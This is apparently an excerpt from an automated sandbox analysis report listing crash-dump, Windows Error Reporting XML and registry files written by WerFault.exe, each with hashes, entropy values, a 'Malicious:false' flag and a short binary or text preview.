                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:07 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):95008
                                Entropy (8bit):1.6935001647359693
                                Encrypted:false
                                SSDEEP:384:OJdUJiSAEDppzfxDIN/vgtFYjD/z0JSstELPaomQGqsg:OJuJiSAEfXwjD/z09tL/A
                                MD5:837260A870052413C1E3BF7238EB11AA
                                SHA1:909552A1E0783D9FD8644B5E0045C2E8106325FE
                                SHA-256:9D23003A8F9A9191C513DB04FAB20CEACB9A03C9D344A9D556281C3073AF834C
                                SHA-512:4DD5EF19A6DB1A349DCB38F223339204E715A0AA4B7BA7F911A18E98445E9BE1676C21C79C00A6351C4ED1B97D756786B73F11F8A66EAD5C3E4D06ADE0091F64
                                Malicious:false
                                Preview:MDMP..a..... .......C..g............T...............\............6..........T.......8...........T............!..(Q..........@...........,...............................................................................eJ..............GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8438
                                Entropy (8bit):3.7045017720529185
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMG6vr6YEIkpSU4/d5gmfDFpBv89bgbisfBbGjm:R6lXJ96j6YEJpSU4/zgmfDagbhfA6
                                MD5:D1188FCDFBDB35AD58AFCBEF2A5BDEEC
                                SHA1:2D1BCDD22B515DD808F22B1E7EF63364092C0E6B
                                SHA-256:310AC606DA4CC2E89988C4E5D6A83966AD21D1E73B3142CCB9D0D3D3860BEA4E
                                SHA-512:581CE11FCE20FCFA0F7AD5460F5967D02A0D6083D0A9D2214B5E8965C9AA2CAACDEF89BB7E337936ACF4C6FF4CC39EFAA55EEEC78759B663A7E4FBA9440173EB
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491673418699922
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYZYm8M4J/HFvLSl+q8vG0eRYld:uIjfjI7qO7VZJ1kK/SYld
                                MD5:B15A1C3CD086AE9822631DEAA8599B04
                                SHA1:621E078A47EFEFE69C62E8C0F4C39B913482F17E
                                SHA-256:8B8A3479B10FA3134D9CDB644AE82FDC75E1431D01B03B4F6BAB2E1F3C03969D
                                SHA-512:ACA38905DF07A8D5986ADE4C795FCE82E919BF083FB8FB926496A717C1E77049D6BECFD9FE13CBBC05CDDB933175E198858AAB73B0F5B59A22576545C8544186
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:08 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):94584
                                Entropy (8bit):1.70402820810177
                                Encrypted:false
                                SSDEEP:384:ddUJGAE6ZzFTI9/PgtFYjD/z0JAki7rUeoilE:duJGAEK5hwjD/z0mrh/E
                                MD5:FC97F9CE1A5F7E9811628E7E002B2975
                                SHA1:E4E88B5538E05173986C62C8849AE4E5D3A086CD
                                SHA-256:73BE8A0509792743C18F8A797A9DDDA354CDAB1910C515D24B3CC151DF66FEAD
                                SHA-512:343273704AD997D4B3B6235408BABDE2468928AF7FB3696FA7D015CB18AC87B5A0F4308292392E4C458634389A8EC5379AE407641D92A5529547309C7E608203
                                Malicious:false
                                Preview:MDMP..a..... .......D..g............T...............\............6..........T.......8...........T............!...O..........@...........,...............................................................................eJ..............GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.7038565675250825
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMQ6R16YEIkQSU4/d5gmfDFpBP89bZisfBzm:R6lXJL6j6YEJQSU4/zgmfD6Zhf4
                                MD5:64A1E3631A5B31C9CA6F77C389EBBF3F
                                SHA1:1EA3DEFD6819D3932D7AD3E6512B58F8AB61EE91
                                SHA-256:89B5BFA4C4D00F5EF81619354E922013AC11CBF33B5A977F359EA3E23868C3B7
                                SHA-512:FC1DA549F8A415EF8D7E0D5B1B53913C984AC3C5068407054C94BB119AAF4FBF908B905557C7B6DE6DB1E049DF5202D8CE954B8423046751C8CCDAFEF93BBA44
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.490268603129628
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYIYm8M4J/HFxjq+q8vG0eRYld:uIjfjI7qO7VcJHqK/SYld
                                MD5:51BA80D37B008C9E810F1881676915B0
                                SHA1:ABDE5225646A61CB0A40A12A9ADF66C87E5E74B5
                                SHA-256:60DC903F0DF7C202DB6331211CC4FF5F6F016A3636050E6D0A73EB372FE716FA
                                SHA-512:408AA7C2D17C3FAB20C80DFF4D41E1114718C1C67651613F594E072E05E0AFCA229C48636D120C31E6ABC3E39981FCAEBC0D94B01C0D658E491241AD389A09F9
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:08 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):101974
                                Entropy (8bit):1.70003865925256
                                Encrypted:false
                                SSDEEP:384:vSxuS13iAEeszpPvNIIuT/rgjjD/CWJR6qlkGqQ8UD0:vPS1yAEes1PvvjjD/CWp7A
                                MD5:875B74E103645B328B617721CC4B7E87
                                SHA1:F10659D9EB20B7DF3A8D3570102A24316263B556
                                SHA-256:F98C89FEECC91EF6964325B9E0272EAAF0D5A54F3DC9395B57B0569BF387F918
                                SHA-512:5E970E6A5DD2D1BDB14852E9D90A83CACD626B7E2C38DEA82D828A173CC073D90FAE9F462D4EDAAAD6C693456AE518A3D7849D66DEBFD857FCDF81D4496DCCAC
                                Malicious:false
                                Preview:MDMP..a..... .......D..g........................(...............f;..........T.......8...........T............*..>d......................................................................................................eJ......8.......GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.7043781264973528
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMp6B6YEIklSUQ/LsgmfDFpBP89bQisftwm:R6lXJS6B6YEJlSUQ/AgmfD6Qhfv
                                MD5:B4596C336513B9DA365A454414024016
                                SHA1:00F15200E09912B81D930B08DB6645D5B9F99DEE
                                SHA-256:998D2CB195A2BC59463639E1D1083C7AA8311F9324C6599942D3BDF0540FB99E
                                SHA-512:3FA511FA89263DEEB70DAD91817E0DD92E3E1D7CCEFD6214D2792EED770AC8EBFCC4E8663AD58D6D7A08AE58491CFD05F77DF38C76719B5A68D9B9CC484A2C54
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491856035589698
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYTYm8M4J/HFvWI+q8vG0eRYld:uIjfjI7qO7VbJRK/SYld
                                MD5:CFD4F7EB83DB84CD25B964E3529CC481
                                SHA1:178C1162F195759A7FCB21E7DE38679BB2E88F01
                                SHA-256:B5F0B4D3A197CB5EC00B5300FB9F8EA36A9172420C8036C2BBB327DC55CECFC3
                                SHA-512:8BF7C2C1AA8B39B0ABCD234F2718108D4A1CF07CEE3439BDEACD20B445F679AFA1EC6F18FDB426F916C8EA5049A2D25FDB59D1F40BE221AF75D96A0D1E26A663
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:10 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):114678
                                Entropy (8bit):1.8275237192852272
                                Encrypted:false
                                SSDEEP:384:6Wixku1SAEMYud6zeOn3PTNkIwT/7e+jD/CWJAMMrSmfVM+JT8rc1:bu8AEnud6KOrH+jD/CWKtnJwI
                                MD5:1DE74A6B182596F0550CDBDA316CB8B0
                                SHA1:A2E51D5EFBE2CD1CF2C159B740886C53DE059C82
                                SHA-256:3CEE61E03BA031C2D75D898F59E9C99E350B24E9C0091504B1E631CE6F69E69B
                                SHA-512:E43F226ED27AE5B860CEDB936A68FFD5A93651F233AF63D2C1666A0592CEC1450ADD188F9BFD6D937FDD7FE28D7E22BB37D022747E8F4F1F4F17A9D4104E1C90
                                Malicious:false
                                Preview:MDMP..a..... .......F..g........................................z@..........T.......8...........T...........X0..........................................................................................................eJ..............GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.7055027591143705
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMj6G6YEIkK0SUo3/mgmfDFpBT89bgisfxgm:R6lXJ46G6YEJpSUu/mgmfDughfD
                                MD5:9991E1A12A183743E999166457315A8A
                                SHA1:7FF581301F991E93F5B14A604ED9F2C80DC059B1
                                SHA-256:D4427510E48C739A10F758EFA9ED7E0015E1003D98F22C2CD22F65C11D042C27
                                SHA-512:9B791683D569421EAF7B639F502C1B6480A1DDCA7DAF49F888111C17BA52C4A03BB4A17475F96B0844AB73C735DE36FCE5925E12DCF560B99E58AE1960307ED7
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491282796860016
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYrYm8M4J/HFC+q8vG0eRYld:uIjfjI7qO7V3J4K/SYld
                                MD5:73278FD55039AF183CC858C923B596D6
                                SHA1:B2F046EE466724ACD92FA9E007FD19ED6A339721
                                SHA-256:90DF732B72B8CC4BF4F161A0A07EE382B249FE3399D39FAB85954E1A91214887
                                SHA-512:1F14C1735EE207FDB08A25C9FABE5A9300A2866BFE81A11739E56ED9EAE5C28E6516E231D0F9FC1E7624520857A7E6E3CC902D9811B837C42AC382B94FA960AE
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:13 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):60356
                                Entropy (8bit):1.8043498263060342
                                Encrypted:false
                                SSDEEP:192:1yBrGFnh7XwfsOAOJwH0M+IBHSrPVKIcn8dFqDYOeQ1yRZYFajccuAloLUNr0NA:4iFnCAEzIBHS9v8ZyCajMADNreA
                                MD5:B29F5C3DD829FEFB6401147AB34CBBE2
                                SHA1:9E3D28A060631BAB75CFF5C2FD72D7D2B9027474
                                SHA-256:2CC5BAA025747D0F97E35E99F0D6D2AC277572BEDA95FB09E785E3BDFB9472A6
                                SHA-512:4994D8B7036CA04A8295B3CBBB93E07C44EE52C13AD3A6A1233F384C6F7657CC5BE3D46B9FD93C99F64E3E6F287B4152339DF1B93F1AF690315E18C803750544
                                Malicious:false
                                Preview:MDMP..a..... .......I..g............4...............<...........0*..........T.......8...........T............2.............X...........D...............................................................................eJ..............GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8338
                                Entropy (8bit):3.7030068183474896
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMM6C6YEIkuSUz/OgmfmkymqpDRC89bbisfoJm:R6lXJv6C6YEJuSUz/Ogmfmt7bhfb
                                MD5:9568BE933ED7B60D689BAE6F36096893
                                SHA1:BEAC059E41E305369D7AC3A4B042B24E48ED2700
                                SHA-256:B9CC99914E967ECC85086F8370C373CB1A4CB97ED4A168D90E5CA3B652BDB0A1
                                SHA-512:11FA46CA688FB796A5B655B447F8CA1D1B71946F22406ADD6FEEC409B21A50DB772A54979EDA034590CC21772D205BC2CB9EE0FA882A4619384C04D1F58C71A6
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4579
                                Entropy (8bit):4.470361341953126
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYyYm8M4J/qLFUZ8I+q8ew4eRYld:uIjfjI7qO7ViJy+Zx44SYld
                                MD5:C6B54BA331F6F942E3CFE655765CDB31
                                SHA1:F513C3A1C272DD65F5AC9D25393D05E3C523F2F1
                                SHA-256:27EA01BBD0286F131D78801939B0EE80B4B754A432CE3CADC0BC09DFE3AF2F1D
                                SHA-512:18857FEFDC8099A248005208BED0935AE9D03C45709C2B015472B24D9A00F0DD897839AC48EF64D507746EC7AC665E5AE218C0B05E1B3E11DBC9A19F525CB546
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.421552564282905
                                Encrypted:false
                                SSDEEP:6144:tSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNO0uhiTw:UvloTMW+EZMM6DFyw03w
                                MD5:197A31A893A8E46046766B6328EC2C01
                                SHA1:A5E4176C904346DD0AE4BAA2D180BFF18634D817
                                SHA-256:1FDB1EEA0A6DA557EFA54D6B66C697CBA0ACA821971147E539642037356CF4FE
